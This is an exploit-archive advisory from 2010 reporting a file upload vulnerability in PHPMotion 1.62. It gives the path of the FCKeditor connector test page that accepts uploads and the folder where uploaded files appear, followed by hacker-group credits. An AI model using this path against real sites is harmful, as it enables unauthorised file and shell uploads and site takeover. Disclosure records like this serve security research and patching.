[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHPMotion FCKeditor File Upload Vulnerability
# Published : 2010-11-23
# Author : trycyber
# Previous Title : GetSimple CMS 2.01 and 2.02 Administrative Credentials Disclosure
# Next Title : Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
-----------------------------------------------------------------------
phpmotion/FCKeditor File upload vulnerabilities
-----------------------------------------------------------------------
Author : trycyber (trycyber@magelangcyber.com)
Homepage : http://indonesiancoder.com,magelangcyber.web.id
Vendor : http://www.phpmotion.com/
Dork : CIHUY ;p
Version : 1.62
Tested on : Win Xp sp2
Date : November 23, 2010
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
Default : http://127.0.0.1/
exploit : http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
results in : http://127.0.0.1/userfiles/name of file
------------------------------------------------------------------------
Credits
------------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Magelangcyber-team ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ Jundab ~ N4ck0 ~ Yurakha ~ aN93l1c ~ Mboys ~ Contrex ~ n4KuLa_
k4L0ng666 ~ Xr0b0t ~ Adipati ~ Arianom ~ t3ll0 ~ cimpli ~ Pathloader
-------------------------------------------------------------------------
"aku belajar bukan karenamu, melainkan aku ingin aku menjadi aku"
Indonesiancoder family & Magelangcyber family